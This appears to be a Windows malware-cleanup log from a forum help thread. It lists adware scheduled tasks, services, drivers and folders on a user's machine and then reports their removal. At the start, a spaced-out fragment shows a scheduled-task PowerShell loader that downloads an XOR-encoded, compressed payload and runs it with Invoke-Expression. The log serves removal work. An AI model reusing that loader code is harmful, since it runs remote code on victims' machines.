 A 7 E 5 3 4 T K C x 8 Q - d N u 4 c 6 r v E V b 0 y m a & c = R m D 2 h I w I L w A g 1 G c t M H R k k p s M w Z K 4 w e b 1 w I P a M Z 3 2 r Q u K Z V 0 W c P V B M 7 Z J o C 9 Q P T d 5 1 - i w N p m n C H D l 6 j M N o Z 6 W r n - l h Q g a s T Z G j 2 3 1 5 R T J L X I u j 3 f z o Z N F 0 J x d E D _ X W s s l 6 S e Y G d Y R v z 1 h q 5 8 J W n a 0 Q T h Y - J Y B n Q g U 1 7 p T Y o y G c P g 0 f c K i 6 j n z g b K 4 j X a o 4 X c L 4 c T K 9 p U M q f a 9 8 F S O V L K t C Z V t i A x - i 1 4 v o Y 8 C D w j D j A i 9 t E Z L W z U h R F n f n j 4 i U I S G Y L Z K v f A B t 0 Y k V M L U j b L I U 2 n G m T y e z V e h 0 O g m t L I u s 4 8 x n v G x I l I - S C j d B j h _ 2 c m U v i 2 z W s r H q T x Z L P R d _ 6 Q v C B R F R i 2 j 9 o p - O 2 F O 9 K O v a 2 P O n u S 6 5 3 S d B i v 4 A 8 1 W L w E e o L z W E 2 K t i R W c L f j 5 P K M Z p G K t E 8 r M r 5 J u e D 6 d 7 A N 3 W M k r 7 g B 7 W H B x g W K l D 8 X M C 8 g d R z 4 f 3 q Y _ O d 7 z E D X c p 5 s s l l q N i K 4 M q r b A d b 6 l e P o 5 0 x j V 4 P d R K z n 4 b I - L G T t s E q g H c 4 N w 8 b 6 R Q v S i O 7 q R O _ P W u a P x u 9 f l j I g 2 u v c F j C k o T _ y u N h y h G L s 8 u _ 9 b d _ A 2 m z 7 l 3 M i Y 7 s E v L f d U - Z 1 D t T 2 S d x w G 9 D L r N 0 - W I b A R 8 f a P e o 9 T k o m 6 L X e S S O - N 5 r K f 2 g l c d I P n P Z N e u r B U w I S S O J Q 5 1 Z v J Z q J 5 A T U i 2 m B 0 _ O 4 X B H L 5 w h r F r 8 1 D x T O K E y U h J W n v k D s J U Z X R Q Z D E C a J a 6 y f g 7 o L e S y J 3 H A 5 y K n g T p x L q m Z a j h h E O D 9 L T n f b M 0 O q o c I I c A H 2 e g 3 x 6 L C h d E r 6 r N 8 z s r g 6 R - 5 m X Q j b o T l 0 - G o M i N R j H _ t x L Y - Z A w z 9 x y U L k p M d 8 9 z G p R A W x n S 9 P 6 0 O i l x i 0 G b 6 v Q D X A h 9 P r p P g 3 W 6 f Y o 1 T O & r = 2 8 9 6 8 3 4 0 0 4 6 9 9 5 1 6 9 3 6 " ; $ s t s k = " { 7 A 0 4 0 8 4 7 - 0 B 7 A - 0 A 7 E - 0 C 1 1 - 0 F 7 9 0 B 7 D 1 1 0 B } " ; $ p r i d = " D N S U n l o c k e r " ; $ i n i d = " K B F E I I F D " ; t r y { i f ( $ P S V e r s i o n T a b l e . P S V e r s i o n . M a j o r   - l t   2 ) { b r e a k ; } $ v = [ S y s t e m . E n v i r o n m e n t ] : : O S V e r s i o n . V e r s i o n ; 
 i f ( $ v . M a j o r   - e q   5 ) { i f ( ( $ v . M i n o r   - l t   2 )   - A N D   ( ( G e t - W m i O b j e c t   W i n 3 2 _ O p e r a t i n g S y s t e m ) . S e r v i c e P a c k M a j o r V e r s i o n   - l t   2 ) ) { b r e a k ; } } 
 i f ( - N O T   ( [ S e c u r i t y . P r i n c i p a l . W i n d o w s P r i n c i p a l ] [ S e c u r i t y . P r i n c i p a l . W i n d o w s I d e n t i t y ] : : G e t C u r r e n t ( ) ) . I s I n R o l e ( [ S e c u r i t y . P r i n c i p a l . W i n d o w s B u i l t I n R o l e ]   " A d m i n i s t r a t o r " ) ) { b r e a k ; } 
 f u n c t i o n   w c ( $ u r l ) { $ r q = N e w - O b j e c t   S y s t e m . N e t . W e b C l i e n t ; $ r q . U s e D e f a u l t C r e d e n t i a l s = $ t r u e ; $ r q . H e a d e r s . A d d ( " u s e r - a g e n t " , " M o z i l l a / 4 . 0   ( c o m p a t i b l e ;   M S I E   7 . 0 ;   W i n d o w s   N T   6 . 1 ; ) " ) ; r e t u r n   [ S y s t e m . T e x t . E n c o d i n g ] : : A S C I I . G e t S t r i n g ( $ r q . D o w n l o a d D a t a ( $ u r l ) ) ; } 
 f u n c t i o n   d s t r ( $ r a w d a t a ) { $ b t = [ C o n v e r t ] : : F r o m B a s e 6 4 S t r i n g ( $ r a w d a t a ) ; $ e x t = $ b t [ 0 ] ; $ k e y = $ b t [ 1 ]   - b x o r   1 7 0 ; f o r ( $ i = 2 ; $ i   - l t   $ b t . L e n g t h ; $ i + + ) { $ b t [ $ i ] = ( $ b t [ $ i ]   - b x o r   ( ( $ k e y   +   $ i )   - b a n d   2 5 5 ) ) ; } 
 r e t u r n ( N e w - O b j e c t   I O . S t r e a m R e a d e r ( N e w - O b j e c t   I O . C o m p r e s s i o n . D e f l a t e S t r e a m ( ( N e w - O b j e c t   I O . M e m o r y S t r e a m ( $ b t , 2 , ( $ b t . L e n g t h - $ e x t ) ) ) , [ I O . C o m p r e s s i o n . C o m p r e s s i o n M o d e ] : : D e c o m p r e s s ) ) ) . R e a d T o E n d ( ) ; } 
 $ s c = d s t r ( w c ( $ s u r l ) ) ; I n v o k e - E x p r e s s i o n   - c o m m a n d   " $ s c " ; } c a t c h { } ; e x i t   0 ;  Task: {A345F50A-BEB5-406F-A86C-560F43BD91D0} - System32\Tasks\Dawidumb => C:\PROGRA~1\SHOPPE~3\Judtudl.bat Task: {A821AF47-1509-4B3F-B5FA-797801A40D84} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION Task: {C6F42ED2-181F-4404-A691-AC829C597ECC} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION Task: {C70D5ACB-BF20-4069-BEC7-C5C22BF6ED53} - System32\Tasks\{B2401880-868B-4022-9B90-2E43211FA2A1} => pcalua.exe -a C:\Users\Albert\AppData\Local\Temp\onlysetup.exe -c /uninstl Task: {CB41E405-22B9-424B-A7D1-615FB4AA8880} - \LaunchPreSignup -> No File <==== ATTENTION Task: {CCC268D1-108C-47A3-AFB7-1108122DF769} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION Task: {CFE7CC96-7FA9-453E-AFB9-F1664FC28077} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION Task: {D592DCF9-2794-412A-B4EA-791C6139B938} - System32\Tasks\Muueguehnlaek => C:\ProgramData\Muueguehnlaek\1.0.7.1\ibownaoe.exe Task: {D708A76D-DBD4-4641-B2B1-3EB0FC697EB3} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> No File <==== ATTENTION Task: {E56F9A00-36D8-43DE-BA66-7C7D3C0FE24F} - System32\Tasks\Nhfolr => C:\PROGRA~1\SHOPPE~1\Jieczhi.bat Task: {E62EAA57-79B8-4DAB-A699-AAAC1363F68B} - System32\Tasks\PFExe => C:\Users\Albert\AppData\Local\PriceFountain\pricefountain.exe <==== ATTENTION Task: {E95CD12D-ECAD-44EA-84BA-C313E232D0E9} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION Task: {EFC17773-F9EA-461F-AFF9-5D48AC85435C} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION Task: {F07B4757-5DE7-4127-93F2-5840B62D68F0} - System32\Tasks\VJBJMDRJBRJCQACG => C:\ProgramData\Service1291\Service1291.exe [2016-02-15] () <==== ATTENTION Task: C:\WINDOWS\Tasks\NPSEYLEPFCUWGUQR.job => C:\ProgramData\Service1104\Service1104.exe <==== ATTENTION Task: C:\WINDOWS\Tasks\VJBJMDRJBRJCQACG.job => C:\ProgramData\Service1291\Service1291.exe <==== ATTENTION StartMenuInternet: IEXPLORE.EXE - C:\Program Files\Internet Explorer\iexplore.exe hxxp://www.istartpageing.com/?type=sc&ts=1452823320&z=f959342320f8bfa8cd09b0eg8zawao6b8o6c3c1g1g&from=cmi&uid=WDCXWD5000LPVX-60V0TT0_WD-WXE1E24VM102VM102 S2 Oseozg; "C:\Users\Albert\AppData\Roaming\MerjBub\Gonceep.exe" -cms [X] S2 pclient; "C:\Program Files\pclient\pclient.exe" /s iid=4866725 did=APSFImali sid=3 ref=17682ede-e21f-213a-91da-e7e0f69ac9e8-PolicyMac id=f6df92e0a5c0d75900546ee7cf11b4825800009ec553df840e1f184bc0ffcdc7 [X] S2 Sorkicgo; "C:\Users\Albert\AppData\Roaming\NaopwPubn\Cogbat.exe" -cms [X] S2 SynTPEnhService; "C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe" [X] S2 Update Checked List; "C:\Program Files (x86)\Checked List\updateCheckedList.exe" [X] S2 Update Simple for You; "C:\Program Files (x86)\Simple for You\updateSimpleforYou.exe" [X] S2 Util Great Hub; "C:\Program Files (x86)\Great Hub\bin\utilGreatHub.exe" [X] S2 WajaNetEn Monitor; "C:\Program Files\WajaNetEn\0ccd4704b83ea0dacf1d0f37b241054e.exe" [X] S2 wucotusy; C:\Program Files (x86)\90DB1DCE-1452822710-E311-B2A0-288023FF79AB\hnsdF359.tmp [X] S2 xycewozozbt; C:\Program Files (x86)\90DB1DCE-1452822710-E311-B2A0-288023FF79AB\knsl3B77.tmp [X] S2 zutuzuni; C:\Program Files (x86)\90DB1DCE-1452822710-E311-B2A0-288023FF79AB\jnszCEA9.tmp [X] S1 swsedrvr_vw_1_10_0_25; system32\drivers\swsedrvr_vw_1_10_0_25.sys [X] S1 {0ae6a885-0fb1-4244-a055-126ed790cca7}Gw64; system32\drivers\{0ae6a885-0fb1-4244-a055-126ed790cca7}Gw64.sys [X] S1 {29ceb117-5e62-490b-8e5d-97f7ec432220}Gw64; system32\drivers\{29ceb117-5e62-490b-8e5d-97f7ec432220}Gw64.sys [X] S1 {2a6b0fdc-8815-4aa5-a061-069d6db3f642}Gw64; system32\drivers\{2a6b0fdc-8815-4aa5-a061-069d6db3f642}Gw64.sys [X] S1 {f0d54446-7cd7-458a-8a86-e54cb3c15f3d}Gw64; system32\drivers\{f0d54446-7cd7-458a-8a86-e54cb3c15f3d}Gw64.sys [X] 2016-02-17 20:01 - 2016-02-17 20:01 - 00000000 ____D C:\ProgramData\08fec31f-6735-1 2016-02-17 18:10 - 2016-02-17 18:10 - 00003256 _____ C:\WINDOWS\System32\Tasks\Run_Bobby_Browser 2016-02-17 18:09 - 2016-02-18 07:54 - 00000000 ____D C:\Users\Albert\AppData\Local\BoBrowser 2016-02-17 18:09 - 2016-02-17 18:30 - 00000000 ____D C:\Users\Albert\AppData\Roaming\PefdFabebak 2016-02-17 18:09 - 2016-02-17 18:09 - 00022716 _____ C:\WINDOWS\System32\Tasks\{7A040847-0B7A-0A7E-0C11-0F790B7D110B} 2016-02-17 16:42 - 2016-02-17 16:42 - 00000000 ____D C:\Program Files (x86)\Pro PC Cleaner 2016-02-16 15:58 - 2016-02-16 15:58 - 00000000 ____D C:\WINDOWS\system32\sin 2016-02-16 15:43 - 2016-02-16 15:43 - 00000000 ____D C:\WINDOWS\system32\oce 2016-02-16 14:30 - 2016-02-16 14:30 - 00000000 ____D C:\WINDOWS\system32\luek 2016-02-16 10:21 - 2016-02-16 10:21 - 00000000 ____D C:\WINDOWS\system32\pao 2016-02-16 10:07 - 2016-02-16 10:07 - 00000000 ____D C:\WINDOWS\system32\biv 2016-02-16 10:02 - 2016-02-16 10:02 - 00000000 ____D C:\WINDOWS\system32\eou ***************** HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\mpck_us_017010207 => value not found. HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\ospd_us_037010239 => value not found. HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\oasi_en_066020241 => value not found. HKU\S-1-5-21-32271450-1060499967-3261820355-1001\Software\Microsoft\Windows\CurrentVersion\Run\\Birds => value removed successfully HKU\S-1-5-21-32271450-1060499967-3261820355-1001\Software\Microsoft\Windows\CurrentVersion\Run\\Windi => value removed successfully HKU\S-1-5-21-32271450-1060499967-3261820355-1001\Software\Microsoft\Windows\CurrentVersion\Run\\Itibiti.exe => value not found. HKU\S-1-5-21-32271450-1060499967-3261820355-1001\Software\Microsoft\Windows\CurrentVersion\Run\\CrashService => value not found. "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer" => key removed successfully "HKU\S-1-5-21-32271450-1060499967-3261820355-1001\SOFTWARE\Policies\Microsoft\Internet Explorer" => key removed successfully HKU\S-1-5-21-32271450-1060499967-3261820355-1001\Software\Microsoft\Internet Explorer\Main\\Search Page => value restored successfully HKU\S-1-5-21-32271450-1060499967-3261820355-1001\Software\Microsoft\Internet Explorer\Main\\Start Page => value restored successfully HKU\S-1-5-21-32271450-1060499967-3261820355-1001\Software\Microsoft\Internet Explorer\Main\\Search Bar => value not found. HKU\S-1-5-21-32271450-1060499967-3261820355-1001\Software\Microsoft\Internet Explorer\Main\\SearchAssistant => value not found. HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value restored successfully HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\ielnksrch => key not found. HKCR\Wow6432Node\CLSID\ielnksrch => key not found. HKU\S-1-5-21-32271450-1060499967-3261820355-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value removed successfully HKU\S-1-5-21-32271450-1060499967-3261820355-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{015DB5FA-EAFB-4592-A95B-F44D3EE87FA9} => key not found. HKCR\CLSID\{015DB5FA-EAFB-4592-A95B-F44D3EE87FA9} => key not found. HKU\S-1-5-21-32271450-1060499967-3261820355-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} => key not found. HKCR\CLSID\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} => key not found. HKU\S-1-5-21-32271450-1060499967-3261820355-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{187E1DF6-DFD0-4217-B13D-6069A2CE3B70} => key not found. HKCR\CLSID\{187E1DF6-DFD0-4217-B13D-6069A2CE3B70} => key not found. HKU\S-1-5-21-32271450-1060499967-3261820355-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{398B2D84-6A60-43BD-9832-6B70D8E6F841} => key not found. HKCR\CLSID\{398B2D84-6A60-43BD-9832-6B70D8E6F841} => key not found. HKU\S-1-5-21-32271450-1060499967-3261820355-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{ielnksrch} => key not found. HKCR\CLSID\{ielnksrch} => key not found. HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{3beacc4a-b617-4519-bb20-e5970414cbe4} => key not found. HKCR\Wow6432Node\CLSID\{3beacc4a-b617-4519-bb20-e5970414cbe4} => key not found. BHO-x322016-02-16 09:56 - 2016-02-16 09:56 - 00000000 ____D C:\WINDOWS\system32\oci: Oasis Space 1.0.0.7 -> {567dbf58-4713-45f4-a623-e7b41f898209} -> C:\Program Files (x86)\Oasis Space\OasisSpacebho.dll => No FileFramework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll => No File => Error: No automatic fix found for this entry. "C:\ProgramData\Browser" => not found. C:\WINDOWS\system32\jyoj => moved successfully C:\WINDOWS\system32\jij => moved successfully C:\WINDOWS\system32\teh => moved successfully C:\WINDOWS\system32\cokb => moved successfully C:\WINDOWS\system32\kijh => moved successfully C:\WINDOWS\system32\gaf => moved successfully "C:\Program Files\shopperz160220160808" => not found. C:\WINDOWS\System32\Tasks\Afefph => moved successfully "C:\Program Files (x86)\DailyPcClean Support" => not found. "C:\Users\Albert\Documents\DailyPCClean" => not found. "C:\Users\Albert\AppData\Local\winone" => not found. C:\Users\Albert\AppData\Local\Dynamation => moved successfully C:\Users\Albert\AppData\Local\One10_PC_CleanerUn => moved successfully C:\Users\Albert\AppData\Local\SatakMalwareBusterSetup => moved successfully C:\Users\Albert\AppData\Local\ElevatedDiagnostics => moved successfully C:\places.sqlite => moved successfully C:\WINDOWS\system32\sonq => moved successfully "C:\WINDOWS\System32\Tasks\Muueguehnlaek" => not found. "C:\ProgramData\Muueguehnlaek" => not found. "C:\WINDOWS\Tasks\VJBJMDRJBRJCQACG.job" => not found. "C:\WINDOWS\Tasks\NPSEYLEPFCUWGUQR.job" => not found. "C:\WINDOWS\System32\Tasks\VJBJMDRJBRJCQACG" => not found. "C:\WINDOWS\System32\Tasks\NPSEYLEPFCUWGUQR" => not found. "C:\Program Files\shopperz150220161159" => not found. "C:\ProgramData\Service1291" => not found. "C:\ProgramData\Service1104" => not found. "C:\ProgramData\28341ff220e0446c9fff27c4493d622e" => not found. "C:\ProgramData\19a87fa1ec024bbcbb41931263354405" => not found. C:\WINDOWS\SysWOW64\Number of results => moved successfully C:\Users\Albert\AppData\Roaming\agent.dat => moved successfully C:\Users\Albert\AppData\Roaming\ApplicationHosting.dat => moved successfully C:\Users\Albert\AppData\Roaming\Config.xml => moved successfully C:\Users\Albert\AppData\Roaming\InstallationConfiguration.xml => moved successfully C:\Users\Albert\AppData\Roaming\Installer.dat => moved successfully C:\Users\Albert\AppData\Roaming\lobby.dat => moved successfully C:\Users\Albert\AppData\Roaming\Main.dat => moved successfully C:\Users\Albert\AppData\Roaming\md.xml => moved successfully C:\Users\Albert\AppData\Roaming\Newfan.tst => moved successfully C:\Users\Albert\AppData\Roaming\noah.dat => moved successfully C:\Users\Albert\AppData\Roaming\S-Tip.bin => moved successfully C:\Users\Albert\AppData\Roaming\Techzap.bin => moved successfully C:\Users\Albert\AppData\Roaming\Tipin.tst => moved successfully C:\Users\Albert\AppData\Roaming\uninstall_temp.ico => moved successfully C:\Users\Albert\AppData\Roaming\WB.CFG => moved successfully C:\Users\Albert\AppData\Local\resmon.resmoncfg => moved successfully C:\Users\Albert\AppData\Local\uninstall.exe => moved successfully C:\Users\Albert\AppData\Local\updt.js => moved successfully "C:\ProgramData\{262E20B8-6E20-4CEF-B1FD-D022AB1085F5}.dat" => not found. "C:\ProgramData\{262E20B8-6E20-4CEF-B1FD-D022AB1085F5}.dat" => not found. C:\Users\Albert\AppData\Local\Temp\compete.exe => moved successfully "C:\Users\Albert\AppData\Local\Temp\diam18525.exe" => not found. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{0064C8EA-67E0-4457-BD69-32D599E3C1EF}" => key removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0064C8EA-67E0-4457-BD69-32D599E3C1EF}" => key removed successfully C:\WINDOWS\System32\Tasks\Tionhelf => moved successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Tionhelf" => key removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{2084E9B9-858D-4A3A-9312-521FB19716EE}" => key removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2084E9B9-858D-4A3A-9312-521FB19716EE}" => key removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B" => key removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{4042D5AE-8749-4590-92C6-492AA614E28F}" => key removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{4042D5AE-8749-4590-92C6-492AA614E28F}" => key removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\launchtrayprocess" => key removed successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{54019748-4CDB-41E3-860B-E701E3C8FEF8} => key not found. C:\WINDOWS\System32\Tasks\NPSEYLEPFCUWGUQR => not found. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\NPSEYLEPFCUWGUQR => key not found. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{57777FB8-CC07-4567-9CD4-53072709F25C}" => key removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{57777FB8-CC07-4567-9CD4-53072709F25C}" => key removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Time-5d" => key removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{5C6C3B2B-DE18-44F3-8CEB-160233F5E746}" => key removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{5C6C3B2B-DE18-44F3-8CEB-160233F5E746}" => key removed successfully C:\WINDOWS\System32\Tasks\Afefph => not found. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Afefph" => key removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{6D022E8A-F563-4BB6-9347-5DDA2D258152}" => key removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6D022E8A-F563-4BB6-9347-5DDA2D258152}" => key removed successfully C:\WINDOWS\System32\Tasks\{9F779DF3-D491-4CB4-BB47-26D3DA7EB4A9} => moved successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{9F779DF3-D491-4CB4-BB47-26D3DA7EB4A9}" => key removed successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{88006AD2-3895-42CC-B38D-84A2850B48AA} => key not found. C:\WINDOWS\System32\Tasks\crash_service => not found. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\crash_service => key not found. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{88AE8E82-77F9-4332-9850-A7A03DB62A15}" => key removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{88AE8E82-77F9-4332-9850-A7A03DB62A15}" => key removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfig" => key removed successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{90B854D9-6B12-416F-B8BB-C5BF4B291E72} => key not found. C:\WINDOWS\System32\Tasks\Run_Bobby_Browser => not found. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Run_Bobby_Browser => key not found. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{954ECB1A-5683-4DFB-BA1D-2683F8F031AC}" => key removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{954ECB1A-5683-4DFB-BA1D-2683F8F031AC}" => key removed successfully C:\WINDOWS\System32\Tasks\{7A040847-0B7A-0A7E-0C11-0F790B7D110B} => moved successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{7A040847-0B7A-0A7E-0C11-0F790B7D110B}" => key removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{A345F50A-BEB5-406F-A86C-560F43BD91D0}" => key removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A345F50A-BEB5-406F-A86C-560F43BD91D0}" => key removed successfully C:\WINDOWS\System32\Tasks\Dawidumb => moved successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Dawidumb" => key removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{A821AF47-1509-4B3F-B5FA-797801A40D84}" => key removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A821AF47-1509-4B3F-B5FA-797801A40D84}" => key removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d" => key removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C6F42ED2-181F-4404-A691-AC829C597ECC}" => key removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C6F42ED2-181F-4404-A691-AC829C597ECC}" => key removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d" => key removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C70D5ACB-BF20-4069-BEC7-C5C22BF6ED53}" => key removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C70D5ACB-BF20-4069-BEC7-C5C22BF6ED53}" => key removed successfully C:\WINDOWS\System32\Tasks\{B2401880-868B-4022-9B90-2E43211FA2A1} => moved successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{B2401880-868B-4022-9B90-2E43211FA2A1}" => key removed successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CB41E405-22B9-424B-A7D1-615FB4AA8880} => key not found. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\LaunchPreSignup => key not found. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{CCC268D1-108C-47A3-AFB7-1108122DF769}" => key removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CCC268D1-108C-47A3-AFB7-1108122DF769}" => key removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent" => key removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{CFE7CC96-7FA9-453E-AFB9-F1664FC28077}" => key removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CFE7CC96-7FA9-453E-AFB9-F1664FC28077}" => key removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\gwx\refreshgwxcontent" => key removed successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D592DCF9-2794-412A-B4EA-791C6139B938} => key not found. C:\WINDOWS\System32\Tasks\Muueguehnlaek => not found. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Muueguehnlaek => key not found. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{D708A76D-DBD4-4641-B2B1-3EB0FC697EB3}" => key removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D708A76D-DBD4-4641-B2B1-3EB0FC697EB3}" => key removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd" => key removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{E56F9A00-36D8-43DE-BA66-7C7D3C0FE24F}" => key removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E56F9A00-36D8-43DE-BA66-7C7D3C0FE24F}" => key removed successfully C:\WINDOWS\System32\Tasks\Nhfolr => moved successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Nhfolr" => key removed successfully HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E62EAA57-79B8-4DAB-A699-AAAC1363F68B} => key not found. C:\WINDOWS\System32\Tasks\PFExe => not found. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\PFExe => key not found. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{E95CD12D-ECAD-44EA-84BA-C313E232D0E9}" => key removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E95CD12D-ECAD-44EA-84BA-C313E232D0E9}" => key removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Setup\GWXTriggers\Logon-5d" => key removed successfully "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{EFC17773-F9EA-461F-AFF9-5D48AC85435C}" => key removed successfully "HKLM\SOFTWARE\Microsoft\Windows 